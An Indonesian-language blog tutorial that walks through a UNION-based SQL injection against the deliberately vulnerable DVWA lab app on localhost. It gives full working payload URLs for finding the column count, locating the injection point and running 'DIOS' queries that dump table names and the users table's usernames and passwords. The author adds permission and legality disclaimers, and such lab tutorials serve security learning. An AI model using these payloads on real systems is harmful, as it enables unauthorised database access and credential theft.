Pembuka
Kali ini saya akan membagikan cara yang biasa saya gunakan dalam penyerangan atau cara hack website dengan exploit SQL injection, sebelum itu saya menyarankan untuk membaca juga artikel apa itu sql injection, ini refrensi untuk pemula jika anda suhu silahkan di skip hehehe.
Teknik serangan (SQL Injection)
Dalam penyerangan kali ini saya menggunakan DVWA (Damn Vulnerable Web Application) jika anda ingin memakai bisa download di sini, pastikan dalam pentest anda memiliki izin untuk melakukan serangan.
Menentukan error
Mengetahui apakah website ada celah SQL injection bisa menggunakan ' " ; /* */
dan lainnya jika ada pesan error sql atau blank biasanya itu vuln, saya medapatkan url dengan parameter id lalu saya test dengan single quote dan double quote, lihat perbedaan di bawah ini.
Dengan double quote
Dengan single quote
Balancing
Maka mari kita balancing dengan -- -
atau bisa lainya sih seperti +--+ #
, ini biar kode di belakang nya tidak dieksekusi atau tidak di baca atau di anggap komentar, sehabis di balancing website biasanya akan normal seperti di bawah dan jika belum normal sepertinya itu seperti anda wkwkwk(becanda), jika tidak normal anda juga bisa langsung menentukan jumlah column nya tapi dengan syarat pas order by webnya normal kembali kalo masih blank atau error cari balancing lain yang cocok.
Menentukan columns
Langsung saja cek columns menggunakan order by.
- http://localhost/DVWA/vulnerabilities/sqli/?id=1′ order by 1 — -&Submit=Submit -> ok
- http://localhost/DVWA/vulnerabilities/sqli/?id=1′ order by 2 — -&Submit=Submit -> ok
- http://localhost/DVWA/vulnerabilities/sqli/?id=1′ order by 3 — -&Submit=Submit -> error
Kemungkinan besar adalah ada 2 columns, maka tinggal mencari point inject(biasanya di sebut angka ajaib atau angka togel) nya.
Mencari point inject (Mulai SQL Injection)
Tambahkan dash di depan value id, maka akan keluar nomor togel nya.
- http://localhost/DVWA/vulnerabilities/sqli/?id=-1′ union select 1,2 — -&Submit=Submit
HONGKONG keluar angka 2 maszehh hahaha, keluar angka pada first name dan surname berati anda bisa memakai angka tersebut untuk melihat isi database.
Mengeluarkan isi database (dump)
Titik akhir dimana kita akan mendapatkan informasi atau data di dalam server sql, pilih angka yang muncul pada proses diatas sesuai keinginan kalian, saya contohkan menggunakan angka 2 dan memakai Zen DIOS.
Tampilkan tables dan columns menggunakan DIOS
- http://localhost/DVWA/vulnerabilities/sqli/?id=-1′ union select 1,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@) — -&Submit=Submit
Tampilkan isi cloumn menggunakan DIOS
Ganti information_schema.columns dengan nama table dan table_name,column_name dengan nama column, saya contohkan dump table users dengan column user dan password.
- http://localhost/DVWA/vulnerabilities/sqli/?id=-1′ union select 1,make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3c6c693e,user,password)),@) — -&Submit=Submit
Penutup
Oke, cukup itu saja bagaimana cara hack website dengan SQL Injection. Saya ingatkan lagi pastikan anda mimiliki wewenang atau izin untuk melakukan penetration testing, ini hanya untuk edukasi dan jangan menyalahgunakan exploitasi ini yang melanggar hukum di negara tempat tinggal anda.
0 Comments